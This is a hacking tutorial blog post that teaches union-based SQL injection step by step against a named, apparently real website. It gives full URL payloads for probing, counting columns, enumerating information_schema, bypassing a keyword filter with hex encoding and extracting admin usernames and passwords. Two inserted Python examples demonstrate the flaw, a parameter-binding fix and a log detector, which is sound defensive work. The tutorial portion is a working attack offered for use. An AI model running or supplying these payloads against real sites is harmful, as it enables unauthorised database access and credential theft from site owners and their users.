How to hack Websites with SQL-Injection (Simple Union Base Injection)

Assalam-u-Alaikum friends! MTW HaXer is here. In this tutorial I am going to show you how to hack websites with SQL injection. This is simple union-based SQL injection. InshAllah I will soon post more tutorials on SQL injection. So let's start our simple union-based SQL injection.

Step 1. Find The Injection Point On Any Php Site

(Ex. index.php?id=1, trainers.php?id=2, lageid=2, games.php?id=, porn.phpid=  etc)
Like This Site :- www.site.com/index.php?id=1

Step 2. After finding it, first check whether the site is vulnerable or not.

I have a site: http://bbss.com.pk/index.php?id=483

We will add a single quote (') after ?id=483

Like this: http://bbss.com.pk/index.php?id=483'

Hit Enter.

Step 3. After adding the single quote ('), if the site shows an SQL error or hides data on the page, this means it is vulnerable.

Step 4. Start the operation on the URL. Now we will count the total number of columns in Information_schema.

We will use an ORDER BY query to count the columns.
Like this: http://bbss.com.pk/index.php?id=483 order by 100--

I am putting -- to comment out the rest of the query.
It shows an error, so the total number of columns is between 1 and 100.
Now I will decrease my column number.

Step 4.2. Now I select just 20 columns for sorting the site data.
Like this: http://bbss.com.pk/index.php?id=483 order by 20--

Still an error.

Here the total number of columns is 11, because at 12 there is an error.

Step 5. Now I am going to use the UNION command to check for vulnerable columns.

Like this: http://bbss.com.pk/index.php?id=-483 union select all 1,2,3,4,5,6,7,8,9,10,11--

Here UNION combines both queries: the first is the site's query and the second is my SELECT query.

Here it is not printing the vulnerable columns because there is not sufficient free space to print them, so I will hide the site data by using the -- sign.

Now here the vulnerable columns are 3 and 6.

Now We Will Fetch All The Data Using Column Number 3 And 6.
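
Why the UNION in Step 5 is accepted, and what stops it, shown as an added example that is not part of the original post. It uses Python's sqlite3 with a constructed in-memory schema instead of the site's PHP/MySQL code; the `pages` table layout and all function names are assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the site's schema (hypothetical table layout).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin_login (name TEXT, password TEXT);
        INSERT INTO pages VALUES (483, 'About', 'About us');
        INSERT INTO admin_login VALUES ('admin', 'constructed-hash');
    """)
    return db

def fetch_page_vulnerable(db, raw_id):
    # Flaw: the request parameter is pasted into the SQL text, so whatever
    # follows the number (ORDER BY, UNION SELECT, --) is parsed as SQL.
    sql = "SELECT id, title, body FROM pages WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def fetch_page_bound(db, raw_id):
    # Fix: bind the value. It reaches the engine as data, is compared to id
    # as a single value, matches no row, and the UNION never executes.
    sql = "SELECT id, title, body FROM pages WHERE id = ?"
    return db.execute(sql, (raw_id,)).fetchall()

def fetch_page_hardened(db, raw_id):
    # Defence in depth: an id is a short decimal number and nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a short decimal number")
    return fetch_page_bound(db, int(raw_id))

# Same shape as the Step 5 request: a non-matching id plus a UNION SELECT
# whose column count equals that of the page query (three here).
PAYLOAD = "-483 UNION SELECT 1, name, password FROM admin_login"

def demo():
    db = make_db()
    leaked = fetch_page_vulnerable(db, PAYLOAD)   # admin row comes back
    bound = fetch_page_bound(db, PAYLOAD)         # no rows
    try:
        fetch_page_hardened(db, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return leaked, bound, rejected

if __name__ == "__main__":
    print(demo())
```

In PHP the same fix is a prepared statement (PDO or mysqli) with the id bound as an integer.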


Here are some variables and functions for fetching data from the website:
Variable/Function        : Output
@@hostname               : Current hostname
@@tmpdir                 : Temp directory
@@datadir                : Data directory
@@version                : Version of DB
@@basedir                : Base directory
user()                   : Current user
database()               : Current database
version()                : Version
schema()                 : Current database
UUID()                   : System UUID key
current_user()           : Current user
current_user             : Current user
system_user()            : Current system user
session_user()           : Session user
@@GLOBAL.have_symlink    : Check if symlink is enabled or disabled
@@GLOBAL.have_ssl        : Check if it has SSL or not

Step 6. Now find the database name and version using the vulnerable columns.
Like this: http://bbss.com.pk/index.php?id=-483 union select all 1,2,Database(),4,5,Version(),7,8,9,10,11--

You see on the website page: Database = 'bbss_com_pk_db', Version = '5.1.73-community'

Step 7. Now we will fetch the table names.

Like this: http://bbss.com.pk/index.php?id=-483 union select all 1,2,table_name,4,5,6,7,8,9,10,11 from information_schema.tables--

information_schema is the collection of databases. Here we are fetching all table names from all databases.

Here there is only one table, but I want all the tables of information_schema, so I use group_concat() to group the tables.

Step 8. But I want table names only from the current database, so now we will set a WHERE condition.

Like this: http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--

Now these are all the tables of the database.

Step 9. Now I am unable to see all the tables, so I will use a <br> tag to print each table name on its own line.
Like this: http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name,<br>),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
Hit Enter and we are shown an error. We need to encode the <br> tag as a 0x hex code: <br> = 0x3c62723e
Like this: http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(table_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--

Step 10. Now I fetch the columns of the table named 'admin_login'.

Like this: http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(column_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=admin_login--

Oops, here is a firewall that blocks the table_name=admin_login fetch.
Now I will encode admin_login as a hex value.

Like this: http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(column_name,0x3c62723e),4,5,6,7,8,9,10,11 from information_schema.columns where table_name=0x61646d696e5f6c6f67696e--

We got the admin_login columns.

Step 11. Now I fetch the juicy data, that is, name and password.

Like this: http://bbss.com.pk/index.php?id=-483 union select all 1,2,group_concat(name,0x3a,password),4,5,6,7,8,9,10,11 from admin_login--

In this step I use 0x3a (:) to separate the name and password. And remember to write admin_login as normal text, not the hex-encoded form, in the final step.
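
Every request in Steps 2 to 11 leaves a recognisable query string in the web server's access log. The following added example (not part of the original post) classifies request targets by those patterns and decodes 0x hex literals first, which is why the keyword filter in Step 10 missed the hex-encoded table name. The rule names, the watch list and the sample requests are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

WATCHED_TABLES = ("admin_login",)  # assumption: table names worth alerting on
RULES = {
    "quote_probe": re.compile(r"^-?\d+\s*['\"]"),            # Step 2
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),     # Step 4
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\b"),    # Steps 7 to 10
    "trailing_comment": re.compile(r"--\s*$"),
    "sensitive_table": re.compile(r"\b(?:%s)\b" % "|".join(WATCHED_TABLES)),
}

def _hex_to_text(match):
    # Turn 0x61646d696e... into the quoted string MySQL would see.
    try:
        text = bytes.fromhex(match.group(1)).decode("ascii")
    except ValueError:            # also covers UnicodeDecodeError
        return match.group(0)
    return "'%s'" % text if text.isprintable() else match.group(0)

def normalise(value, decode_hex=True):
    v = value.lower()
    if decode_hex:
        v = re.sub(r"0x((?:[0-9a-f]{2})+)", _hex_to_text, v)
    return re.sub(r"\s+", " ", v).strip()

def classify(target, decode_hex=True):
    """Return the sorted rule names hit by any query parameter value."""
    hits = set()
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        v = normalise(value, decode_hex)
        hits.update(name for name, rx in RULES.items() if rx.search(v))
    return sorted(hits)

# Constructed request targets in access-log form; not from a real server.
SAMPLE_REQUESTS = [
    "/index.php?id=483",
    "/index.php?id=483%27",
    "/index.php?id=483%20order%20by%2020--",
    "/index.php?id=-483+UNION+SELECT+ALL+1,2,group_concat(table_name,0x3c62723e),4"
    "+from+information_schema.tables--",
    "/index.php?id=-483+union+select+1,2,column_name,4+from+information_schema.columns"
    "+where+table_name=0x61646d696e5f6c6f67696e--",
    "/search.php?q=student+union+order+form",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(classify(req), req)
```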

If you have any problem or want any help, contact me on Facebook.
Facebook: https://www.facebook.com/mobeen1337
